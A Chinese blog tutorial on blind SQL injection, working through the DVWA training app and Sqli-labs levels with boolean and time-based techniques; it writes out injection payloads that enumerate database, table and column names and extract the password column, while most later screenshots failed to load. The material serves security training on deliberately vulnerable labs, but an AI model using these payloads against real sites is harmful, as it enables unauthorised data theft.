SQL注入篇——盲注

admin-r꯭o꯭ot꯭

于 2020-01-08 00:12:31 发布

阅读量1.4k

点赞数 10

分类专栏：数据库基础与注入

本文链接：https://blog.csdn.net/weixin_45728976/article/details/103883206

版权

数据库基础与注入专栏收录该内容

17 篇文章

订阅专栏

盲注之布尔类型注入

DVWA平台`low`级别

一、判断数据库名的长度

1' and (length(database()))>4#

在这里插入图片描述
超出长度会报错

二、获取数据库名的字符

判断每个字母在ASCII码中的范围，最终确定是哪个字母

1' and (ascii(substr(database(),n,1)))>66#

在这里插入图片描述

三、获取数据库表名（先获取表名数量，再获取表名长度）

1' and (select count(*) from information_schema.tables where table_schema=database())>5#
1' and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>5#
1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),0,1)))>100#

四、获取列名(先获取列名个数，再获取列名长度，最后获取列名）

1' and (ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)))>100#

五、获取数据

1' and (ascii(substr(( select password from users limit 0,1),1,1)))=68#

DVWA平台`Medium`级别

一、使用`Burp Suite`抓包

判断数据库名的长度

1 and (length(database()))>4#

在这里插入图片描述

DVWA平台High级别

一、判断数据库名的长度

1' and (length(database()))>3#

在这里插入图片描述

Sqli-labs-master

1、第一关：

sql注入类型为字符型注入（单引号）

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3dVrr0Ll-1578413180075)(file:///C:\Users\sq\AppData\Local\Temp\ksohtml6248\wps1.jpg)]$

查看数据库：

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nbcfyzeP-1578413180075)(file:///C:\Users\sq\AppData\Local\Temp\ksohtml6248\wps2.jpg)]$

2、第二关：

Sql注入类型为数值型注入

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-P0dtp3ah-1578413180076)(file:///C:\Users\sq\AppData\Local\Temp\ksohtml6248\wps3.jpg)]$

查看数据库：

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-NgbU3vIX-1578413180076)(file:///C:\Users\sq\AppData\Local\Temp\ksohtml6248\wps4.jpg)]$

3、第三关：

sql注入类型为字符型注入（单引号、单括号）
$图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-efLsG3Hi-1578413180077)(file:///C:\Users\sq\AppData\Local\Temp\ksohtml6248\wps5.jpg)]$

查看数据库：

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-vqJEYBNg-1578413180078)(file:///C:\Users\sq\AppData\Local\Temp\ksohtml6248\wps6.jpg)]$

4、第四关：

sql注入类型为字符型注入（双引号、单括号）

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yLvl1RLi-1578413180078)(file:///C:\Users\sq\AppData\Local\Temp\ksohtml6248\wps7.jpg)]$

查看数据库：

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-r7K6l7Q3-1578413180078)(file:///C:\Users\sq\AppData\Local\Temp\ksohtml6248\wps8.jpg)]$

5、第五关：

sql注入类型为报错注入（单引号）

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-zRyesW1q-1578413180078)(file:///C:\Users\sq\AppData\Local\Temp\ksohtml6248\wps9.jpg)]$

查看那数据库

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-vIfhd5ah-1578413180079)(file:///C:\Users\sq\AppData\Local\Temp\ksohtml6248\wps10.jpg)]$

6、第六关：

sql注入类型为：报错注入（双引号）

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Jw6wMx0x-1578413180079)(file:///C:\Users\sq\AppData\Local\Temp\ksohtml6248\wps11.jpg)]$

查看数据库：

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jok6Gg52-1578413180080)(file:///C:\Users\sq\AppData\Local\Temp\ksohtml6248\wps12.jpg)]$

7、第七关：

sql注入类型为：布尔注入

（1）判断数据库长度为8

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tk0XVoLN-1578413180080)(file:///C:\Users\sq\AppData\Local\Temp\ksohtml6248\wps13.jpg)]$

（2）找到数据库对应的ascii值

第一个为115，对应s

$ [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-JgWcuhxq-1578413180080)(file:///C:\Users\sq\AppData\Local\Temp\ksohtml6248\wps14.jpg)]$

第二个为101，对应e

$ [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-UmpqJsyB-1578413180080)(file:///C:\Users\sq\AppData\Local\Temp\ksohtml6248\wps15.jpg)]$

以此类推：第三个为99；第四个为117；第五个为114；第六个为105；第七个为：116；第八个为121

8、第八关：

sql注入类型为：布尔注入（单引号）

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VUzUObk3-1578413180081)(file:///C:\Users\sq\AppData\Local\Temp\ksohtml6248\wps16.jpg)]$

获取数据库：将相应的字符转换成ascii值（获取八次）

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EZccFgqG-1578413180081)(file:///C:\Users\sq\AppData\Local\Temp\ksohtml6248\wps17.jpg)]$

9、第九关：

Sql注入类型为：延时注入和布尔注入（单引号）

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PdtXWfpA-1578413180082)(file:///C:\Users\sq\AppData\Local\Temp\ksohtml6248\wps18.jpg)]$

获取当前数据库名：

（1）判断数据库名长度为8

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Jcp0ucnI-1578413180083)(file:///C:\Users\sq\AppData\Local\Temp\ksohtml6248\wps19.jpg)]$

（3）将相应的字符转换成ascii值，成功之后将会延时十秒

第一个为字节对应的ascii值为115

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gEKrUsEO-1578413180083)(file:///C:\Users\sq\AppData\Local\Temp\ksohtml6248\wps20.jpg)]$

第二个字节对应的ascii值为101

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-kTKIR20I-1578413180083)(file:///C:\Users\sq\AppData\Local\Temp\ksohtml6248\wps21.jpg)]$

10、第十关：

sql注入类型为：延时注入和布尔注入（双引号）

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xXIfYMYK-1578413180084)(file:///C:\Users\sq\AppData\Local\Temp\ksohtml6248\wps22.jpg)]$

获取当前数据库名：

（1）判断字符串长度为8

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-duE95XzE-1578413180084)(file:///C:\Users\sq\AppData\Local\Temp\ksohtml6248\wps23.jpg)]$

（2）将第一个字节转化为ascii值

SQL注入篇——盲注

盲注之布尔类型注入

DVWA平台low级别

一、判断数据库名的长度

二、获取数据库名的字符

三、获取数据库表名（先获取表名数量，再获取表名长度）

四、获取列名(先获取列名个数，再获取列名长度，最后获取列名）

五、获取数据

DVWA平台Medium级别

一、使用Burp Suite抓包

DVWA平台High级别

一、判断数据库名的长度

Sqli-labs-master

DVWA平台`low`级别

DVWA平台`Medium`级别

一、使用`Burp Suite`抓包